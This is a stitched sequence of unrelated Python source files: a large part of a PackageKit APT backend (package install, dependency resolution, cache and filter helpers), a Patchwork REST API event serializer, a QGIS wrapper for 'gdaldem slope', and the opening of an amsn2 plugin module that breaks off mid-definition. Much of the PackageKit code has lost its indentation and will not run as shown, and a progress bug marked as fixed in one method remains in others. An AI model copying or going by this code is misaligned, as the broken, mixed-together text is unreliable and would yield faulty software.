        if len(remove) > 0:
            raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                          "Remove the following packages "
                          "before: %s" % remove)
        if (deb.compare_to_version_in_cache() ==
                apt.debfile.DebPackage.VERSION_OUTDATED):
            self.message(enums.MESSAGE_NEWER_PACKAGE_EXISTS,
                         "There is a later version of %s "
                         "available in the repositories." % deb.pkgname)
    # Install the collected repository dependencies first
    if self._cache.get_changes():
        self._check_trusted(only_trusted)
        self._commit_changes(fetch_start=10, fetch_end=25,
                             install_start=25, install_end=50)
    # Install the Debian package files
    progress = PackageKitDpkgInstallProgress(self, start=50, end=90)
    try:
        progress.start_update()
        progress.install(inst_files)
        progress.finish_update()
    except PKError as error:
        self._recover()
        raise error
    except Exception as error:
        self._recover()
        raise PKError(enums.ERROR_INTERNAL_ERROR, format_string(str(error)))
    self.percentage(100)
@catch_pkerror
def simulate_install_files(self, inst_files):
    """Emit the change required for the installation of the given package
    files.
    """
    pklog.info("Simulating installation of the package files: "
               "%s" % inst_files)
    self.status(enums.STATUS_DEP_RESOLVE)
    self.allow_cancel(True)
    self.percentage(None)
    self._check_init(progress=False)
    names = []
    for deb_path in inst_files:
        deb_pkg = apt.debfile.DebPackage(deb_path, self._cache)
        names.append(deb_pkg.pkgname)
        if not deb_pkg.check():
            raise PKError(enums.ERROR_LOCAL_INSTALL_FAILED,
                          format_string(deb_pkg._failure_string))
    self._emit_changes(names)
@catch_pkerror
@lock_cache
def refresh_cache(self, force):
    """Download fresh repository indexes and re-open the cache.

    The force flag is currently not evaluated (TODO).
    """
    pklog.info("Refresh cache")
    self.status(enums.STATUS_REFRESH_CACHE)
    self.last_action_time = time.time()
    # Cleanup: dropped a stray trailing semicolon and an unused 'ret ='
    # binding of the update() result.
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init()
    progress = PackageKitAcquireRepoProgress(self, start=10, end=95)
    try:
        self._cache.update(progress)
    except Exception as error:
        # FIXME: Unluckily python-apt doesn't provide a real good error
        #        reporting. We only receive a failure string.
        # FIXME: Doesn't detect if all downloads failed - bug in python-apt
        self.message(enums.MESSAGE_REPO_METADATA_DOWNLOAD_FAILED,
                     format_string(str(error)))
    self._open_cache(start=95, end=100)
    self.percentage(100)
@catch_pkerror
def get_packages(self, filters):
    """Emit every package in the cache that matches the given filters."""
    pklog.info("Get all packages")
    self.status(enums.STATUS_QUERY)
    self.percentage(None)
    self._check_init(progress=False)
    self.allow_cancel(True)
    total = len(self._cache)
    for count, pkg in enumerate(self._cache):
        # BUGFIX: the progress formula was inverted (count / 100 * total),
        # which under Python 2 integer division reports 0 for the first
        # 100 packages and can greatly exceed 100 afterwards.
        self.percentage(count * 100 / total)
        if self._is_package_visible(pkg, filters):
            self._emit_package(pkg)
@catch_pkerror
def resolve(self, filters, names):
    """
    Implement the apt2-resolve functionality

    Emits a visible package for every resolvable name; raises
    PKError(ERROR_PACKAGE_NOT_FOUND) for unknown names.
    """
    pklog.info("Resolve")
    self.status(enums.STATUS_QUERY)
    self.percentage(None)
    self._check_init(progress=False)
    self.allow_cancel(False)
    for pkg_name in names:
        try:
            self._emit_visible_package(filters, self._cache[pkg_name])
        except KeyError:
            raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
                          "Package name %s could not be resolved" % pkg_name)
@catch_pkerror
def get_depends(self, filters, ids, recursive):
"""Emit all dependencies of the given package ids.
Doesn't support recursive dependency resolution.
"""
def emit_blocked_dependency(base_dependency, pkg=None,
filters=[]):
"""Send a blocked package signal for the given
apt.package.BaseDependency.
"""
if enums.FILTER_INSTALLED in filters:
return
if pkg:
summary = pkg.summary
try:
filters.remove(enums.FILTER_NOT_INSTALLED)
except ValueError:
pass
if not self._is_package_visible(pkg, filters):
return
else:
summary = ""
if base_dependency.relation:
version = "%s%s" % (base_dependency.relation,
base_dependency.version)
else:
version = base_dependency.version
self.package("%s;%s;;" % (base_dependency.name, version),
enums.INFO_BLOCKED, summary)
def check_dependency(pkg, base_dep):
"""Check if the given apt.package.Package can satisfy the
BaseDepenendcy and emit the corresponding package signals.
"""
if not self._is_package_visible(pkg, filters):
return
if base_dep.version:
satisfied = False
# Sort the version list to check the installed
# and candidate before the other ones
ver_list = list(pkg.versions)
if pkg.installed:
ver_list.remove(pkg.installed)
ver_list.insert(0, pkg.installed)
if pkg.candidate:
ver_list.remove(pkg.candidate)
ver_list.insert(0, pkg.candidate)
for dep_ver in ver_list:
if apt_pkg.check_dep(dep_ver.version,
base_dep.relation,
base_dep.version):
self._emit_pkg_version(dep_ver)
satisfied = True
break
if not satisfied:
emit_blocked_dependency(base_dep, pkg, filters)
else:
self._emit_package(pkg)
# Setup the transaction
pklog.info("Get depends (%s,%s,%s)" % (filter, ids, recursive))
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
dependency_types = ["PreDepends", "Depends"]
if apt_pkg.config["APT::Install-Recommends"]:
dependency_types.append("Recommends")
total = len(ids)
for count, id in enumerate(ids):
self.percentage(count / 100 * total)
version = self._get_version_by_id(id)
for dependency in version.get_dependencies(*dependency_types):
# Walk through all or_dependencies
for base_dep in dependency.or_dependencies:
if self._cache.is_virtual_package(base_dep.name):
# Check each proivider of a virtual package
for provider in \
self._cache.get_providing_packages(base_dep.name):
check_dependency(provider, base_dep)
elif base_dep.name in self._cache:
check_dependency(self._cache[base_dep.name], base_dep)
else:
# The dependency does not exist
emit_blocked_dependency(base_dep, filters=filters)
@catch_pkerror
def get_requires(self, filters, ids, recursive):
"""Emit all packages which depend on the given ids.
Recursive searching is not supported.
"""
pklog.info("Get requires (%s,%s,%s)" % (filter, ids, recursive))
self.status(enums.STATUS_DEP_RESOLVE)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(True)
total = len(ids)
for count, id in enumerate(ids):
self.percentage(count / 100 * total)
version = self._get_version_by_id(id)
for pkg in self._cache:
if not self._is_package_visible(pkg, filters):
continue
if pkg.is_installed:
pkg_ver = pkg.installed
elif pkg.candidate:
pkg_ver = pkg.candidate
for dependency in pkg_ver.dependencies:
satisfied = False
for base_dep in dependency.or_dependencies:
if version.package.name == base_dep.name or \
base_dep.name in version.provides:
satisfied = True
break
if satisfied:
self._emit_package(pkg)
break
@catch_pkerror
def what_provides(self, filters, provides_type, search):
def get_mapping_db(path):
"""
Return the gdbm database at the given path or send an
appropriate error message
"""
if not os.access(path, os.R_OK):
pklog.warning("list of applications that can handle files of the given type %s does not exist")
return None
try:
db = gdbm.open(path)
except:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"The list of applications that can handle "
"files of the given type cannot be opened.\n"
"Try to reinstall the package "
"app-install-data.")
else:
return db
def extract_gstreamer_request(search):
# The search term from PackageKit daemon:
# gstreamer0.10(urisource-foobar)
# gstreamer0.10(decoder-audio/x-wma)(wmaversion=3)
match = re.match("^gstreamer(?P<version>[0-9\.]+)"
"\((?P<kind>.+?)-(?P<data>.+?)\)"
"(\((?P<opt>.*)\))?",
search)
caps = None
if not match:
raise PKError(enums.ERROR_NOT_SUPPORTED,
"The search term is invalid: %s" % search)
if match.group("opt"):
caps_str = "%s, %s" % (match.group("data"), match.group("opt"))
# gst.Caps.__init__ cannot handle unicode instances
caps = gst.Caps(str(caps_str))
record = GSTREAMER_RECORD_MAP[match.group("kind")]
return match.group("version"), record, match.group("data"), caps
self.status(enums.STATUS_QUERY)
self.percentage(None)
self._check_init(progress=False)
self.allow_cancel(False)
supported_type = False
if provides_type in (enums.PROVIDES_CODEC, enums.PROVIDES_ANY):
supported_type = True
# Search for privided gstreamer plugins using the package
# metadata
import gst
GSTREAMER_RECORD_MAP = {"encoder": "Gstreamer-Encoders",
"decoder": "Gstreamer-Decoders",
"urisource": "Gstreamer-Uri-Sources",
"urisink": "Gstreamer-Uri-Sinks",
"element": "Gstreamer-Elements"}
for search_item in search:
try:
gst_version, gst_record, gst_data, gst_caps = \
extract_gstreamer_request(search_item)
except PKError:
if provides_type == enums.PROVIDES_ANY:
break # ignore invalid codec query, probably for other types
else:
raise
for pkg in self._cache:
if pkg.installed:
version = pkg.installed
elif pkg.candidate:
version = pkg.candidate
else:
continue
if not "Gstreamer-Version" in version.record:
continue
if version.record["Gstreamer-Version"] != gst_version:
continue
if gst_caps:
try:
pkg_caps = gst.Caps(version.record[gst_record])
except KeyError:
continue
if gst_caps.intersect(pkg_caps):
self._emit_visible_package(filters, pkg)
else:
try:
elements = version.record[gst_record]
except KeyError:
continue
if gst_data in elements:
self._emit_visible_package(filters, pkg)
if provides_type in (enums.PROVIDES_MIMETYPE, enums.PROVIDES_ANY):
supported_type = True
# Emit packages that contain an application that can handle
# the given mime type
for search_item in search:
handlers = set()
db = get_mapping_db("/var/lib/PackageKit/mime-map.gdbm")
if db == None:
if provides_type != enums.PROVIDES_ANY:
raise PKError(enums.ERROR_INTERNAL_ERROR,
"The list of applications that can handle "
"files of the given type cannot be opened.")
else:
break
if search_item in db:
pklog.debug("Mime type is registered: %s" % db[search_item])
# The mime type handler db stores the packages as a string
# separated by spaces. Each package has its section
# prefixed and separated by a slash
# FIXME: Should make use of the section and emit a
# RepositoryRequired signal if the package does not exist
handlers = [s.split("/")[1] for s in db[search_item].split(" ")]
self._emit_visible_packages_by_name(filters, handlers)
if provides_type in (enums.PROVIDES_MODALIAS, enums.PROVIDES_ANY):
supported_type = True
system_architecture = apt_pkg.get_architectures()[0]
# Emit packages that contain an application that can handle
# the given modalias
valid_modalias_re = re.compile('^[a-z0-9]+:')
for search_item in search:
if not valid_modalias_re.match(search_item):
if provides_type != enums.PROVIDES_ANY:
raise PKError(enums.ERROR_NOT_SUPPORTED,
"The search term is invalid: %s" % search_item)
else:
continue
for package in self._cache:
# skip foreign architectures, we usually only want native
# driver packages
if (not package.candidate or
package.candidate.architecture not in ("all",
system_architecture)):
continue
try:
m = package.candidate.record['Modaliases']
except (KeyError, AttributeError):
continue
try:
pkg_matches = False
for part in m.split(')'):
part = part.strip(', ')
if not part:
continue
module, lst = part.split('(')
for alias in lst.split(','):
alias = alias.strip()
if fnmatch.fnmatch(search_item, alias):
self._emit_visible_package(filters, package)
pkg_matches = True
break
if pkg_matches:
break
except ValueError:
pklog.warning("Package %s has invalid modalias header: %s" % (
package.name, m))
# run plugins
for plugin in self.plugins.get("what_provides", []):
pklog.debug("calling what_provides plugin %s" % str(plugin))
for search_item in search:
try:
for package in plugin(self._cache, provides_type, search_item):
self._emit_visible_package(filters, package)
supported_type = True
except NotImplementedError:
pass # keep supported_type as False
if not supported_type and provides_type != enums.PROVIDES_ANY:
raise PKError(enums.ERROR_NOT_SUPPORTED,
"This function is not implemented in this backend")
@catch_pkerror
def get_files(self, package_ids):
"""Emit the Files signal which includes the files included in a package
Apt only supports this for installed packages
"""
self.status(enums.STATUS_INFO)
total = len(package_ids)
self._check_init(progress=False)
for count, id in enumerate(package_ids):
self.percentage(count / 100 * total)
pkg = self._get_package_by_id(id)
files = ";".join(pkg.installed_files)
self.files(id, files)
# Helpers
    def _init_plugins(self):
        """Initialize plugins.

        Populates self.plugins, a mapping of plugin name -> list of
        callables, from setuptools entry points in the
        "packagekit.apt.plugins" group (currently only "what_provides").
        Plugins that fail to load are logged and skipped.
        """
        self.plugins = {}  # plugin_name -> [plugin_fn1, ...]
        if not pkg_resources:
            # setuptools is unavailable; run without plugin support.
            return
        # just look in standard Python paths for now
        dists, errors = pkg_resources.working_set.find_plugins(pkg_resources.Environment())
        for dist in dists:
            pkg_resources.working_set.add(dist)
        for plugin_name in ["what_provides"]:
            for entry_point in pkg_resources.iter_entry_points(
                    "packagekit.apt.plugins", plugin_name):
                try:
                    plugin = entry_point.load()
                except Exception as e:
                    # A broken plugin must not take the backend down.
                    pklog.warning("Failed to load %s from plugin %s: %s" % (
                        plugin_name, str(entry_point.dist), str(e)))
                    continue
                pklog.debug("Loaded %s from plugin %s" % (
                    plugin_name, str(entry_point.dist)))
                self.plugins.setdefault(plugin_name, []).append(plugin)
def _unlock_cache(self):
"""Unlock the system package cache."""
try:
apt_pkg.pkgsystem_unlock()
except SystemError:
return False
return True
    def _open_cache(self, start=0, end=100, progress=True, fail_broken=True):
        """(Re)Open the APT cache.

        :param start: Progress percentage reported at the start of loading.
        :param end: Progress percentage reported when loading finishes.
        :param progress: Whether to report loading progress at all.
        :param fail_broken: If True, raise if the cache has broken packages.
        :raises PKError: ERROR_NO_CACHE if the cache cannot be opened,
            ERROR_DEP_RESOLUTION_FAILED on broken packages.
        """
        pklog.debug("Open APT cache")
        self.status(enums.STATUS_LOADING_CACHE)
        # A ROOT environment variable allows operating on an alternative
        # root directory (chroot-like tree).
        rootdir = os.getenv("ROOT", "/")
        if rootdir == "/":
            rootdir = None
        try:
            self._cache = apt.Cache(PackageKitOpProgress(self, start, end,
                                                         progress),
                                    rootdir=rootdir)
        except Exception as error:
            raise PKError(enums.ERROR_NO_CACHE,
                          "Package cache could not be opened:%s" % error)
        if self._cache.broken_count > 0 and fail_broken:
            raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                          "There are broken dependecies on your system. "
                          "Please use an advanced package manage e.g. "
                          "Synaptic or aptitude to resolve this situation.")
        if rootdir:
            # Point dpkg at the alternative root and keep its log there.
            apt_pkg.config.clear("DPkg::Post-Invoke")
            apt_pkg.config.clear("DPkg::Options")
            apt_pkg.config["DPkg::Options::"] = "--root=%s" % rootdir
            dpkg_log = "--log=%s/var/log/dpkg.log" % rootdir
            apt_pkg.config["DPkg::Options::"] = dpkg_log
        self._last_cache_refresh = time.time()
def _recover(self, start=95, end=100):
"""Try to recover from a package manager failure."""
self.status(enums.STATUS_CLEANUP)
self.percentage(None)
try:
d = PackageKitDpkgInstallProgress(self)
d.start_update()
d.recover()
d.finish_update()
except:
pass
self._open_cache(start=95, end=100)
def _check_trusted(self, only_trusted):
"""Check if only trusted packages are allowed and fail if
untrusted packages would be installed in this case.
"""
untrusted = []
if only_trusted:
for pkg in self._cache:
if (pkg.marked_install or pkg.marked_upgrade or
pkg.marked_downgrade or pkg.marked_reinstall):
trusted = False
for origin in pkg.candidate.origins:
trusted |= origin.trusted
if not trusted:
untrusted.append(pkg.name)
if untrusted:
raise PKError(enums.ERROR_MISSING_GPG_SIGNATURE,
" ".join(untrusted))
def _commit_changes(self, fetch_start=10, fetch_end=50,
install_start=50, install_end=90):
"""Commit changes to the system."""
acquire_prog = PackageKitAcquireProgress(self, fetch_start, fetch_end)
inst_prog = PackageKitInstallProgress(self, install_start, install_end)
try:
self._cache.commit(acquire_prog, inst_prog)
except apt.cache.FetchFailedException as err:
if acquire_prog.media_change_required:
raise PKError(enums.ERROR_MEDIA_CHANGE_REQUIRED,
format_string(err.message))
else:
pklog.critical(format_string(err.message))
raise PKError(enums.ERROR_PACKAGE_DOWNLOAD_FAILED,
format_string(err.message))
except apt.cache.FetchCancelledException:
raise PKError(enums.TRANSACTION_CANCELLED)
except PKError as error:
self._recover()
raise error
except SystemError as error:
self._recover()
raise PKError(enums.ERROR_INTERNAL_ERROR,
format_string("%s\n%s" % (str(error),
inst_prog.output)))
def _get_id_from_version(self, version):
"""Return the package id of an apt.package.Version instance."""
if version.origins:
origin = version.origins[0].label
else:
origin = ""
id = "%s;%s;%s;%s" % (version.package.name, version.version,
version.architecture, origin)
return id
def _check_init(self, start=0, end=10, progress=True, fail_broken=True):
"""Check if the backend was initialized well and try to recover from
a broken setup.
"""
pklog.debug("Checking apt cache and xapian database")
pkg_cache = os.path.join(apt_pkg.config["Dir"],
apt_pkg.config["Dir::Cache"],
apt_pkg.config["Dir::Cache::pkgcache"])
src_cache = os.path.join(apt_pkg.config["Dir"],
apt_pkg.config["Dir::Cache"],
apt_pkg.config["Dir::Cache::srcpkgcache"])
# Check if the cache instance is of the coorect class type, contains
# any broken packages and if the dpkg status or apt cache files have
# been changed since the last refresh
if not isinstance(self._cache, apt.cache.Cache) or \
(self._cache.broken_count > 0) or \
(os.stat(apt_pkg.config["Dir::State::status"])[stat.ST_MTIME] > \
self._last_cache_refresh) or \
(os.stat(pkg_cache)[stat.ST_MTIME] > self._last_cache_refresh) or \
(os.stat(src_cache)[stat.ST_MTIME] > self._last_cache_refresh):
pklog.debug("Reloading the cache is required")
self._open_cache(start, end, progress, fail_broken)
else:
pass
# Read the pin file of Synaptic if available
self._cache._depcache.read_pinfile()
if os.path.exists(SYNAPTIC_PIN_FILE):
self._cache._depcache.read_pinfile(SYNAPTIC_PIN_FILE)
# Reset the depcache
self._cache.clear()
def _emit_package(self, pkg, info=None, force_candidate=False):
"""Send the Package signal for a given APT package."""
if (not pkg.is_installed or force_candidate) and pkg.candidate:
self._emit_pkg_version(pkg.candidate, info)
elif pkg.is_installed:
self._emit_pkg_version(pkg.installed, info)
else:
pklog.debug("Package %s hasn't got any version." % pkg.name)
def _emit_pkg_version(self, version, info=None):
"""Emit the Package signal of the given apt.package.Version."""
id = self._get_id_from_version(version)
section = version.section.split("/")[-1]
if not info:
if version == version.package.installed:
if section == "metapackages":
info = enums.INFO_COLLECTION_INSTALLED
else:
info = enums.INFO_INSTALLED
else:
if section == "metapackages":
info = enums.INFO_COLLECTION_AVAILABLE
else:
info = enums.INFO_AVAILABLE
self.package(id, info, version.summary)
def _emit_all_visible_pkg_versions(self, filters, pkg):
"""Emit all available versions of a package."""
if self._is_package_visible(pkg, filters):
if enums.FILTER_NEWEST in filters:
if pkg.candidate:
self._emit_pkg_version(pkg.candidate)
elif pkg.installed:
self._emit_pkg_version(pkg.installed)
else:
for version in pkg.versions:
self._emit_pkg_version(version)
def _emit_visible_package(self, filters, pkg, info=None):
"""Filter and emit a package."""
if self._is_package_visible(pkg, filters):
self._emit_package(pkg, info)
def _emit_visible_packages(self, filters, pkgs, info=None):
"""Filter and emit packages."""
for p in pkgs:
if self._is_package_visible(p, filters):
self._emit_package(p, info)
def _emit_visible_packages_by_name(self, filters, pkgs, info=None):
"""Find the packages with the given namens. Afterwards filter and emit
them.
"""
for name in pkgs:
pkg = self._cache[name]
if self._is_package_visible(pkg, filters):
self._emit_package(pkg, info)
def _emit_changes(self, ignore_pkgs=[]):
"""Emit all changed packages."""
for pkg in self._cache:
if pkg.name in ignore_pkgs:
continue
if pkg.marked_delete:
self._emit_package(pkg, enums.INFO_REMOVING, False)
elif pkg.marked_install:
self._emit_package(pkg, enums.INFO_INSTALLING, True)
elif pkg.marked_upgrade:
self._emit_package(pkg, enums.INFO_UPDATING, True)
elif pkg.marked_downgrade:
self._emit_package(pkg, enums.INFO_DOWNGRADING, True)
elif pkg.marked_reinstall:
self._emit_package(pkg, enums.INFO_REINSTALLING, True)
def _is_package_visible(self, pkg, filters):
"""Return True if the package should be shown in the user
interface.
"""
if filters == [enums.FILTER_NONE]:
return True
for filter in filters:
if ((filter == enums.FILTER_INSTALLED and not pkg.is_installed) or
(filter == enums.FILTER_NOT_INSTALLED and pkg.is_installed) or
(filter == enums.FILTER_SUPPORTED and not
self._is_package_supported(pkg)) or
(filter == enums.FILTER_NOT_SUPPORTED and
self._is_package_supported(pkg)) or
(filter == enums.FILTER_FREE and not
not self._is_package_free(pkg)) or
(filter == enums.FILTER_NOT_FREE and
not self._is_package_not_free(pkg)) or
(filter == enums.FILTER_GUI and
not self._has_package_gui(pkg)) or
(filter == enums.FILTER_NOT_GUI and
self._has_package_gui(pkg)) or
(filter == enums.FILTER_COLLECTIONS and not
self._is_package_collection(pkg)) or
(filter == enums.FILTER_NOT_COLLECTIONS and
self._is_package_collection(pkg)) or
(filter == enums.FILTER_DEVELOPMENT and not
self._is_package_devel(pkg)) or
(filter == enums.FILTER_NOT_DEVELOPMENT and
self._is_package_devel(pkg))):
return False
return True
def _is_package_not_free(self, pkg):
"""Return True if we can be sure that the package's license isn't any
free one
"""
#FIXME: Should check every origin
origins = pkg.candidate.origins
return (origins != None and \
((origins[0].origin == "Ubuntu" and
origins[0].component in ["multiverse", "restricted"]) or
(origins[0].origin == "Debian" and
origins[0].component in ["contrib", "non-free"])) and
origins[0].trusted == True)
def _is_package_collection(self, pkg):
"""Return True if the package is a metapackge."""
section = pkg.section.split("/")[-1]
return section == "metapackages"
def _is_package_free(self, pkg):
"""Return True if we can be sure that the package has got a free
license.
"""
#FIXME: Should check every origin
origins = pkg.candidate.origins
return (origins[0] != None and
((origins[0].origin == "Ubuntu" and
origins[0].component in ["main", "universe"]) or
(origins[0].origin == "Debian" and
origins[0].component == "main")) and
origins[0].trusted == True)
def _has_package_gui(self, pkg):
#FIXME: should go to a modified Package class
#FIXME: take application data into account. perhaps checking for
# property in the xapian database
return pkg.section.split('/')[-1].lower() in ['x11', 'gnome', 'kde']
def _is_package_devel(self, pkg):
#FIXME: should go to a modified Package class
return pkg.name.endswith("-dev") or pkg.name.endswith("-dbg") or \
pkg.section.split('/')[-1].lower() in ['devel', 'libdevel']
def _is_package_supported(self, pkg):
origins = pkg.candidate.origins
#FIXME: iterate on all origins
return (origins != None and
origins[0].origin == "Ubuntu" and
origins[0].component in ["main", "restricted"] and
origins[0].trusted == True)
def _get_pkg_version_by_id(self, id):
"""Return a package version matching the given package id or None."""
name, version, arch, data = id.split(";", 4)
try:
for pkg_ver in self._cache[name].versions:
if pkg_ver.version == version and \
pkg_ver.architecture == arch:
return pkg_ver
except KeyError:
pass
return None
def _get_package_by_id(self, id):
"""Return the apt.package.Package corresponding to the given
package id.
If the package isn't available error out.
"""
version = self._get_version_by_id(id)
return version.package
def _get_version_by_id(self, id):
"""Return the apt.package.Version corresponding to the given
package id.
If the version isn't available error out.
"""
name, version_string, arch, data = id.split(";", 4)
try:
pkg = self._cache[name]
except:
raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
"There isn't any package named %s" % name)
try:
version = pkg.versions[version_string]
except:
raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
"There isn't any verion %s of %s" % (version_string,
name))
if version.architecture != arch:
raise PKError(enums.ERROR_PACKAGE_NOT_FOUND,
"Version %s of %s isn't available for architecture "
"%s" % (pkg.name, version.version, arch))
return version
def _get_package_group(self, pkg):
"""
Return the packagekit group corresponding to the package's section
"""
section = pkg.section.split("/")[-1]
if section in SECTION_GROUP_MAP:
return SECTION_GROUP_MAP[section]
else:
pklog.debug("Unkown package section %s of %s" % (pkg.section,
pkg.name))
return enums.GROUP_UNKNOWN
    def _sigquit(self, signum, frame):
        """Signal handler: release the package system lock and terminate
        with a non-zero exit status.
        """
        self._unlock_cache()
        sys.exit(1)
def main():
    """Entry point: create the backend and dispatch the command line
    arguments to it.
    """
    backend = PackageKitAptBackend()
    backend.dispatcher(sys.argv[1:])


if __name__ == '__main__':
    main()

# vim: ts=4 et sts=4
| coolo/packagekit | backends/apt/aptBackend.py | Python | gpl-2.0 | 99,604 |
# Patchwork - automated patch tracking system
# Copyright (C) 2017 Stephen Finucane <stephen@that.guru>
#
# SPDX-License-Identifier: GPL-2.0-or-later
from collections import OrderedDict
from rest_framework.generics import ListAPIView
from rest_framework.serializers import ModelSerializer
from rest_framework.serializers import SerializerMethodField
from patchwork.api.embedded import CheckSerializer
from patchwork.api.embedded import CoverLetterSerializer
from patchwork.api.embedded import PatchSerializer
from patchwork.api.embedded import ProjectSerializer
from patchwork.api.embedded import SeriesSerializer
from patchwork.api.embedded import UserSerializer
from patchwork.api.filters import EventFilterSet
from patchwork.api.patch import StateField
from patchwork.models import Event
class EventSerializer(ModelSerializer):
    """Serialize an Event, nesting only the fields relevant to its
    category into a "payload" sub-object.
    """

    project = ProjectSerializer(read_only=True)
    patch = PatchSerializer(read_only=True)
    series = SeriesSerializer(read_only=True)
    cover = CoverLetterSerializer(read_only=True)
    previous_state = StateField()
    current_state = StateField()
    previous_delegate = UserSerializer()
    current_delegate = UserSerializer()
    # FIX: this field was declared twice — a SerializerMethodField()
    # assignment was immediately shadowed by the CheckSerializer() one and
    # therefore dead code.
    created_check = CheckSerializer()

    # Maps each event category to the payload fields it exposes.
    _category_map = {
        Event.CATEGORY_COVER_CREATED: ['cover'],
        Event.CATEGORY_PATCH_CREATED: ['patch'],
        Event.CATEGORY_PATCH_COMPLETED: ['patch', 'series'],
        Event.CATEGORY_PATCH_STATE_CHANGED: ['patch', 'previous_state',
                                             'current_state'],
        Event.CATEGORY_PATCH_DELEGATED: ['patch', 'previous_delegate',
                                         'current_delegate'],
        Event.CATEGORY_CHECK_CREATED: ['patch', 'created_check'],
        Event.CATEGORY_SERIES_CREATED: ['series'],
        Event.CATEGORY_SERIES_COMPLETED: ['series'],
    }

    def to_representation(self, instance):
        """Move the category-specific fields into an ordered "payload"
        dict and drop everything irrelevant to this category.
        """
        data = super(EventSerializer, self).to_representation(instance)
        payload = OrderedDict()
        kept_fields = self._category_map[instance.category] + [
            'id', 'category', 'project', 'date']
        # Iterate over a snapshot since we mutate data inside the loop.
        for field in list(data):
            if field not in kept_fields:
                del data[field]
            elif field in self._category_map[instance.category]:
                # "created_check" is exposed as "check" in the payload.
                field_name = 'check' if field == 'created_check' else field
                payload[field_name] = data.pop(field)
        data['payload'] = payload
        return data

    class Meta:
        model = Event
        fields = ('id', 'category', 'project', 'date', 'patch', 'series',
                  'cover', 'previous_state', 'current_state',
                  'previous_delegate', 'current_delegate', 'created_check')
        read_only_fields = fields
class EventList(ListAPIView):
    """List events."""

    serializer_class = EventSerializer
    # Set both attribute names to support old and new django-filter
    # releases (filter_class was renamed to filterset_class).
    filter_class = filterset_class = EventFilterSet
    page_size_query_param = None  # fixed page size
    ordering_fields = ()
    # Newest events first by default.
    ordering = '-date'

    def get_queryset(self):
        """Return all events with their related objects prefetched."""
        return Event.objects.all()\
            .prefetch_related('project', 'patch', 'series', 'cover',
                              'previous_state', 'current_state',
                              'previous_delegate', 'current_delegate',
                              'created_check')
| stephenfin/patchwork | patchwork/api/event.py | Python | gpl-2.0 | 3,356 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
slope.py
---------------------
Date : October 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Alexander Bruy'
__date__ = 'October 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterBoolean
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputRaster
from processing.algs.gdal.GdalUtils import GdalUtils
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class slope(GdalAlgorithm):
    """Processing algorithm wrapping the "gdaldem slope" command-line tool."""

    # Parameter and output identifiers used by the Processing framework.
    INPUT = 'INPUT'
    BAND = 'BAND'
    COMPUTE_EDGES = 'COMPUTE_EDGES'
    ZEVENBERGEN = 'ZEVENBERGEN'
    AS_PERCENT = 'AS_PERCENT'
    SCALE = 'SCALE'
    OUTPUT = 'OUTPUT'

    def group(self):
        """Return the translated toolbox group this algorithm belongs to."""
        return self.tr('Raster analysis')

    def name(self):
        """Return the unique (untranslated) algorithm identifier."""
        return 'slope'

    def displayName(self):
        """Return the translated name shown in the GUI."""
        return self.tr('Slope')

    def defineCharacteristics(self):
        """Declare the algorithm's input parameters and its raster output."""
        self.addParameter(ParameterRaster(self.INPUT, self.tr('Input layer')))
        self.addParameter(ParameterNumber(self.BAND,
                                          self.tr('Band number'), 1, 99, 1))
        self.addParameter(ParameterBoolean(self.COMPUTE_EDGES,
                                           self.tr('Compute edges'), False))
        self.addParameter(ParameterBoolean(self.ZEVENBERGEN,
                                           self.tr("Use Zevenbergen&Thorne formula (instead of the Horn's one)"),
                                           False))
        self.addParameter(ParameterBoolean(self.AS_PERCENT,
                                           self.tr('Slope expressed as percent (instead of degrees)'), False))
        self.addParameter(ParameterNumber(self.SCALE,
                                          self.tr('Scale (ratio of vert. units to horiz.)'),
                                          0.0, 99999999.999999, 1.0))
        self.addOutput(OutputRaster(self.OUTPUT, self.tr('Slope')))

    def getConsoleCommands(self):
        """Build the "gdaldem slope" command line from the current
        parameter values.
        """
        arguments = ['slope']
        arguments.append(str(self.getParameterValue(self.INPUT)))
        output = str(self.getOutputValue(self.OUTPUT))
        arguments.append(output)
        # Derive the GDAL output driver from the output file extension.
        arguments.append('-of')
        arguments.append(GdalUtils.getFormatShortNameFromFilename(output))
        arguments.append('-b')
        arguments.append(str(self.getParameterValue(self.BAND)))
        arguments.append('-s')
        arguments.append(str(self.getParameterValue(self.SCALE)))
        if self.getParameterValue(self.COMPUTE_EDGES):
            arguments.append('-compute_edges')
        if self.getParameterValue(self.ZEVENBERGEN):
            arguments.append('-alg')
            arguments.append('ZevenbergenThorne')
        if self.getParameterValue(self.AS_PERCENT):
            arguments.append('-p')
        return ['gdaldem', GdalUtils.escapeAndJoin(arguments)]
| gioman/QGIS | python/plugins/processing/algs/gdal/slope.py | Python | gpl-2.0 | 3,918 |
# plugins module for amsn2
"""
Plugins with amsn2 will be a subclass of the aMSNPlugin() class.
When this module is initially imported it should load the plugins from the last session. Done in the init() proc.
Then the GUI should call plugins.loadPlugin(name) or plugins.unLoadPlugin(name) in order to deal with plugins.
"""
# init()
# Called when the plugins module is imported (only for the first time).
# Should find plugins and populate a list ready for getPlugins().
# Should also auto-update all plugins.
def init():
    """Initialize the plugin system (stub, not yet implemented)."""
    pass
# loadPlugin(plugin_name)
# Called (by the GUI or from init()) to load a plugin. plugin_name as set in plugin's XML (or from getPlugins()).
# This loads the module for the plugin. The module is then responsible for calling plugins.registerPlugin(instance).
def loadPlugin(plugin_name):
